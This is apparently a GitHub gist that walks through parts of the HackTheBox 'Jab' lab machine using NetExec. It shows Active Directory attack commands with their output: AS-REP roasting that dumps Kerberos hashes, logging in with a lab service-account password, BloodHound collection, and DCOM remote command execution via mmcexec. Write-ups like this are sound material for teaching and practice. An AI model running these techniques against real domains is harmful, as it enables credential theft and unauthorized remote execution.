Skip to content

Instantly share code, notes, and snippets.

@mpgn

mpgn/jab-vs-netexec.md

Last active July 8, 2024 17:49
Show Gist options
  • Save mpgn/af199a6deffbf2ad71fb7d44f9c605ec to your computer and use it in GitHub Desktop.
Save mpgn/af199a6deffbf2ad71fb7d44f9c605ec to your computer and use it in GitHub Desktop.
Download ZIP
Raw
jab-vs-netexec.md

Jab vs NetExec

This writeup only highlights some part of the writeup of @0xdf that can be done with netexec instead of using another tool :)

This is not a full writeup of the JAB machine ! Bug fix on dcom is not fully merge into main !

Thanks to @ippsec for the bug report on mmcexec method !

  1. SMB - TCP 445
┌──(kali㉿kali)-[~/NetExec]
└─$ ~/.local/bin/poetry run netexec smb jab.htb                                                                                         
SMB         10.129.230.215  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
  1. ASREP Roast
┌──(kali㉿kali)-[~/NetExec]
└─$ ~/.local/bin/poetry run netexec ldap jab.htb -u /tmp/users -p '' --asreproast /tmp/hash 
SMB         10.129.230.215  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
LDAP        10.129.230.215  445    DC01             $krb5asrep$23$jmontgomery@JAB.HTB:a19f5d234e79c8e58673d2b92201cf22$ccb19577eec9985e7f8d0b3969bc2153fefa0b89b5359a3f238111d9b01bdf64c057781e8ea2fa6c02d0e1eb161353c1841710fc8f9e860f243487d0b6d098b92ff7e58348d3d886f7375665239297f6180dd9c7e770942da229cc34668e838dd76d9a8abb67ca405c1f22e81920d61615a810938991c4ebf6431c869fc9aede90affe5de5e71fcbab44ece2cd88536b9e2ae9188d20c75235ddf6588ccedcaf566e4d8945d71ba64002fed401e28dc25babb88d04aebf2a136b65f48242b0cd9e0c23fa3c1abeb91e03014a6e58239e33e0e00dadb6043c4e25d77afacd318b6d78                                                                 
LDAP        10.129.230.215  445    DC01             $krb5asrep$23$lbradford@JAB.HTB:a77e1457dbd922dac720a4ab33c17923$6f735d4ea68839ca36112d49d1553126ad1603a44471d2b6d2871f8f5f7967cc894478b5d3a7a47ee7bd68eb6c80818dc4f2abfe771a8cda9cb70b14fff3311c01895d2aa3ccb4e6bf8f208bbe093e4c2cef6e9f113596428372dd41593370822979aa7770c2806838527919a0112252b1a68857062fd3da9e6caf06dc01967268f4c7d509440b398a274737de2fe3cda3978dbeebd050a8af5dc8ca8e3865e613f3ebb99c6fb8e015c2af9f8a0ad28788c1c9d5b165659b49e1f133e761a845ad2a10fd718679196edba1ff87dadc904f8f16516b5d20c497f789d507ff848f2f54                                                                   
LDAP        10.129.230.215  445    DC01             $krb5asrep$23$mlowe@JAB.HTB:6061fe22f16d57efed5a86a7ada716e3$b2721256a257a57754eddde4de38d513b1d0c8e794258bdd9f5b6a0239340cfad9851084a4f9a07df1adedf6824a968f74a9addae0404ef269e7c13502392901cc5c80a16bbcdbc57129d643b1a3e080a2c62552efa925ce84f231f3b26bb97913d4e03b1423bec0bcea7fbaa10385b999daa445170b9366b810cdf50347feaef57bdce3d154d7d104a9cf66cb2062d25d454af4674feb62eae1b694bf04f2a86275dbebc406c7d1591956a7b6db8d7b0f09e30676b27c13b02625f3a70f3c5b025ea6f0be5e290ff38e65cc3d1767f28174570389f6f4f9fd6b227012402f743e2a
  1. Shell as svc_openfire
──(kali㉿kali)-[~/NetExec]
└─$ ~/.local/bin/poetry run netexec smb jab.htb -u svc_openfire -p '!@#$%^&*(1qazxsw'                    
SMB         10.129.230.215  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
SMB         10.129.230.215  445    DC01             [+] jab.htb\svc_openfire:!@#$%^&*(1qazxsw
  1. Bloodhound
┌──(kali㉿kali)-[~/NetExec]
└─$ ~/.local/bin/poetry run netexec ldap jab.htb -u svc_openfire -p '!@#$%^&*(1qazxsw' --bloodhound                             
SMB         10.129.230.215  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
LDAPS       10.129.230.215  636    DC01             [+] jab.htb\svc_openfire:!@#$%^&*(1qazxsw 
LDAPS       10.129.230.215  636    DC01             Resolved collection methods: group, trusts, localadmin, session
LDAP        10.129.230.215  389    DC01             [-] Could not find a domain controller. Consider specifying a domain and/or DNS server.

Adding the dns server option and collection all (recommanded to run with --debug option)

┌──(kali㉿kali)-[~/NetExec]
└─$ ~/.local/bin/poetry run netexec ldap jab.htb -u svc_openfire -p '!@#$%^&*(1qazxsw' --bloodhound --dns-server 10.129.230.215 --collection All
SMB         10.129.230.215  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
LDAPS       10.129.230.215  636    DC01             [+] jab.htb\svc_openfire:!@#$%^&*(1qazxsw 
LDAPS       10.129.230.215  636    DC01             Resolved collection methods: rdp, objectprops, psremote, container, acl, group, localadmin, session, trusts, dcom                                                                                                                                                         
LDAP        10.129.230.215  389    DC01             Done in 03M 05S
LDAPS       10.129.230.215  636    DC01             Compressing output into /home/kali/.nxc/logs/DC01_10.129.230.215_2024-06-30_175135_bloodhound.zip
  1. DCOM Execution

Thanks to @ippsec, an issue with dcom has been resolved :) Run ping to test with tcpdump on another terminal

┌──(kali㉿kali)-[~/NetExec]
└─$ ~/.local/bin/poetry run netexec smb 10.129.230.215 -u svc_openfire -p '!@#$%^&*(1qazxsw' -x 'ping 10.10.14.2' --exec-method mmcexec --no-output 
SMB         10.129.230.215  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
SMB         10.129.230.215  445    DC01             [+] jab.htb\svc_openfire:!@#$%^&*(1qazxsw 
SMB         10.129.230.215  445    DC01             [+] Executed command via mmcexec

image

Et voila ! Peace ✌️

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment